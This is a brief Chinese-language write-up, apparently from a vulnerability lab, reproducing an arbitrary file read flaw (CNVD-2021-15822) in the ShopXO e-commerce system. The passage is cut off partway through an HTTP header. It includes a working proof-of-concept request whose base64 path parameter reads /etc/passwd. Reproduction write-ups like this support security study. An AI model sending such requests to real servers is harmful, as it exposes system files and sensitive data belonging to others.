shopxo文件读取（CNVD-2021-15822）漏洞介绍：ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞，攻击者可利用该漏洞获取敏感信息影响范围：ShopXO版本环境搭建：在线环境地址漏洞复现：访问首页进行burp抓包 将要访问的文件进行编码 构造poc GET/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=HTTP/1.1Host:vulfocus.fofa.so:40398User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:9